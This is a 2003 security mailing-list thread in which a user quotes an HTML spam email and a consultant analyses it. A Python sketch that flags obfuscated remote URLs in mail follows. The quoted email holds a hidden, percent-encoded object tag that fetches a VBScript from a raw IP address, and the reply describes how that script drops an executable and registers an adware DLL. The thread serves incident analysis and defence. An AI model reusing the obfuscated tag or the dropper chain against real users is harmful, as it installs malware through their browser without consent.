Re: Spam-Object Exploit
From: Suresh Ponnusami (surya nsecure.net)
Date: Fri Sep 05 2003 - 00:59:21 CDT
This exploits the ActiveX vulnerability for executing .vbs files.
The encoded data points to http://63.246.130.201/cgi-bin/a.cgi
which is a .vbs named as .cgi. The script creates an exe called
drg.exe at the "C Drive" which downloads and installs
surferbar.dll from the same site. The dll is downloaded into
"C:\Program files\" as "Win32.dll" and regsvr is called to
register the dll. And when your browser starts it'll start displaying
ads and you will be earning counts/clicks for the spammer.
cheers,
Suresh Ponnusami,
Information Security Consultant,
nSecure Software, INDIA
----- Original Message -----
From: "Jon Zerden" <jzbugtraq pchmail.com>
To: <incidents securityfocus.com>
Sent: Thursday, 04 September, 2003 08:25 PM
Subject: Spam-Object Exploit
>
>
> I recently received the following HTML spam e-mail:
>
> ----<html>
> <head>
> <div style="display.none"><object data="http://%363.2%346.%3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>
> </head>
> <body>
> <p>Hey,</p>
> <p>Want to go to the pub on Saturday?</p>
> <p>Last Saturday was a blast!</p>
> <p>Let me know!</p>
> </body>
> ------</html>
>
> It is my assumption that the “Attacker” was trying to exploit the Object
> IE vulnerability discussed in Microsoft bulletin MS03-032.
>
> Has anyone else seen similar spam emails? Does anyone know what this
> Active X object does?
>
> Thanks
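
A triage sketch for the obfuscation discussed in this thread, added here as an example and not written by either poster: it pulls remote-fetching attributes out of an HTML mail body, percent-decodes them, and flags hosts that were hidden behind `%xx` escapes or are bare IP addresses. The names `scan`, `analyse`, `RemoteRefFinder` and `REMOTE_ATTRS` are assumptions of this example, and the sample input is constructed from the quoted spam with the wrapped attribute rejoined.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Constructed sample: the spam body quoted above, wrapped attribute rejoined.
SAMPLE = (
    '<html><head><div style="display.none"><object data="'
    'http://%363.2%346.%3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69'
    '"></object></div></head><body><p>Hey,</p></body></html>'
)

# Tag -> attribute that makes the renderer fetch a remote resource.
REMOTE_ATTRS = {"object": "data", "embed": "src", "iframe": "src", "script": "src"}


def analyse(tag, raw):
    """Decode one URL and list the reasons it looks obfuscated."""
    decoded = unquote(raw)
    # Re-split after decoding: an encoded "/" (%2F) hides the path in the host part.
    parts = urlsplit(decoded)
    host = parts.hostname or ""
    reasons = []
    if "%" in urlsplit(raw).netloc:
        reasons.append("percent-encoded host")
    try:
        ipaddress.ip_address(host)
        reasons.append("raw IP host")
    except ValueError:
        pass  # host is a name, not an IP literal
    return {"tag": tag, "raw": raw, "host": host, "path": parts.path, "reasons": reasons}


class RemoteRefFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        raw = dict(attrs).get(REMOTE_ATTRS.get(tag, ""))
        if not raw:
            return
        try:
            self.findings.append(analyse(tag, raw.strip()))
        except ValueError:  # urlsplit rejects malformed hosts, e.g. a broken "[" literal
            self.findings.append({"tag": tag, "raw": raw, "reasons": ["unparseable URL"]})


def scan(html_body):
    finder = RemoteRefFinder()
    finder.feed(html_body)
    finder.close()
    return finder.findings
```
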